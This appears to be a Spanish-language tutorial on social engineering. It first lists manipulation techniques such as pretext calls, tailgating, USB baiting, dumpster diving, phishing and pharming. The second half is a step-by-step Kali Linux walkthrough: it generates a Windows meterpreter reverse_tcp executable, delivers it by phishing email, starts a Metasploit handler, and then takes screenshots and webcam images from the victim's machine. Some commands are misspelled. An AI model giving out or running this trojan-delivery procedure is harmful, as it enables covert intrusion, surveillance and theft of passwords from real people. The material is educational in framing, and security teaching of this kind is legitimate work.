Ingeniería social

1
 Tabla de contenido

Ingeniería social................................................................................................................. 3

2
 Ingeniería social

Tanto las personas como las empresas estamos expuestos a una serie de ataques en la

red que pueden llegar a recopilar información con la que podemos ser muy vulnerables,

afortunadamente existen varias herramientas que impiden que esto suceda, pero un hacker

no se detiene, cuando los métodos conocidos no pueden penetrar la seguridad o

simplemente se requiere utilizar otro medio diferente, aparece la ingeniería social, esta es

una técnica con manipulación psicológica especialmente ejercida sobre las personas que

tengan a su cargo información importante o necesaria sin que esta se dé cuenta que está

siendo manipulada.

Se nombra “Ingeniería social” ya que ingeniería significa ingenio y social hace referencia a

la sociedad, entonces la ingeniería social es el arte de la manipulación de las personas a

través del ingenio. El ingeniero social Christopher Hannagy la describe como: “Ingeniería

social es el acto de influir en una persona para que lleve a cabo una acción que puede, o

no, ser la mejor para sus intereses”. Las técnicas aplicadas pueden ser orientadas ya que

la acción puede ser una decisión libre en la posibilidad a la persona que la realiza.

Los medios para un ataque de un ingeniero social se pueden realizar por correos

electrónicos, llamadas telefónicas y manipulación directa hacia el objetivo.

El ingeniero social se gana la confianza del personal de la empresa después de hacer un

reconocimiento exhaustivo para detectar cuáles son las personas que pueden manipular

aquella información importante y no le importa el tiempo que se tome para esto, pues una

de sus virtudes es la paciencia, utiliza para esto una serie de herramientas como son:

3
• El teléfono: poder utilizar una falsa identidad a través de engaños y persuadir al

objetivo a revelar los datos que son de su interés como claves, datos personales,

entre otros.

• Invasión al sitio de trabajo o Tailganting: es un acceso a zonas restringidas en

un área de trabajo donde se utiliza una técnica conocida como “Shoulder Surfing” la

cual significa mirar por encima del hombro o leer al revés con la cual se puede

fotografiar, copiar documentos o robar información.

• Una de las técnicas más usadas después de analizar a sus víctimas es dejar al

alcance de esta un dispositivo como memoria USB o cualquier tipo de otro que llame

su atención, contando con la curiosidad del objetivo para que la conecte al

computador y en ese momento infecta la máquina con un archivo ejecutable a

manera de Phishing.

• Fuera de la oficina: el ingeniero social investiga las personas que pueden ser un

fácil objetivo con sus gustos, temores o cualquier cosa que le sea útil y así con

invitaciones fuera de la oficina, aprovecha esa información recogida para extraerle

información valiosa.

• Internet o intranet: hay herramientas que se pueden aprovechar para la

recolección de información de un objetivo, los correos electrónicos con páginas con

códigos maliciosos (phishing, códigos maliciosos en un enlace enviado por correo

electrónico), las páginas webs falsas (scam, sitio web modificado con fines

maliciosos) que son ampliamente utilizadas por este tipo de hacker, las personas

tienden a ser muy repetitivos con sus contraseñas y utilizan las más comunes como,

cumpleaños, placa del vehículo, nombres de padres o hijos y las guardan en el

computador donde es de fácil acceso para cualquiera que desee tomarlas.

4
 • La basura: se pueden encontrar una gran cantidad de información como listados

telefónicos, discos, papel con membrete, memorandos, manuales de sistemas,

agendas, organigramas, dado que el ser humano por lo regular no destruye

documentos, solo los tira. La basura si no se tiene la suficiente precaución con ella

puede representar una de las mejores maneras para el ingeniero social de

penetración en la empresa o el hogar.

• También se utiliza una técnica conocida como pharming, esta técnica es muy

parecida al phishing, pero esta busca el robar la información a través de la

modificación de las consultas realizadas a los servidores DNS en tiempo real,

modifica el archivo lmhost el cual se encarga de asociar la dirección IP al dominio.

Ahora haremos un ejemplo en Kali Linux de la manera como el ingeniero social utiliza una

herramienta para hacer un phishing, en este caso se utilizará un Playload de meterpreter.

El primer paso es conocer la dirección IP del atacante, en este caso la dirección IP del Kali

Linux con el comando ifconfig esto es después de loguearse como usuario root.

5
Lo primero es entrar al escritorio con el comando cd Escritorio/, luego en otra terminal se

escribe el comando msfpayload windows/meterpreter/reverse_tcp –platform Windows –

arch x86 -f exe LHOST=IP del equipo atacante LPORT=Puerto deseado -o Nombre que se

le dará al archivo.exe. debe recordar que Linux toma en cuenta las letras mayúsculas y

minúsculas.

Se comienza con Windows ya que se hará para ejecutar en ese sistema operativo,

meterpreter es una serie de comandos para interactuar con la máquina del objetivo de una

manera segura, x86 para que se pueda utilizar en sistemas operativos tanto de 32 como de

64 bits, LPOTR para indicar cual es el puerto que se utilizará en la conexión y como se está

haciendo un archivo ejecutable, el nombre debe tener la extensión .exe.

Con esto quedará el archivo generado guardado en la ruta dada, este se debe enviar al

equipo objetivo, lo más común para un phishing es un correo electrónico que cuando este

se abre se ejecuta el archivo (Troyano).

6
Se ejecuta el comando msfconsole

En el Kali Linux se escribe el siguiente código use exploit/multi/handler y a continuación en

la siguiente línea se escribe set PAYLOAD windows/meterpreter/reverse_tcp.

Luego set lhost IP del equipo atacante y después ser lport y el puerto designado y por último

escribe exploit

7
Una vez seguidos todos estos pasos la consola queda en espera para obtener los datos del

objetivo, en este se descargó el archivo y se ejecuta, debe saber que para la prueba se

debe deshabilitar el antivirus, y se puede ver en Kali Linux como cargo

Ya se encuentra en el computador del objetivo, para comprobar damos el comando ls para

listar todo su contenido. En él se puede observar el archivo que se envió para la prueba.

8
Con el comando sc reenshot se toma una captura de pantalla del equipo objetivo y con

webcam_snap se toma una imagen de la cámara.

Para conocer que otros comandos se pueden utilizar solo se escribe help y mostrará un

listado general.

De esta manera y utilizando los comandos apropiados se puede tener acceso total al

computador del objetivo, revisar su contenido, agregar carpetas y archivos, obtener

contraseñas y mucho más.

9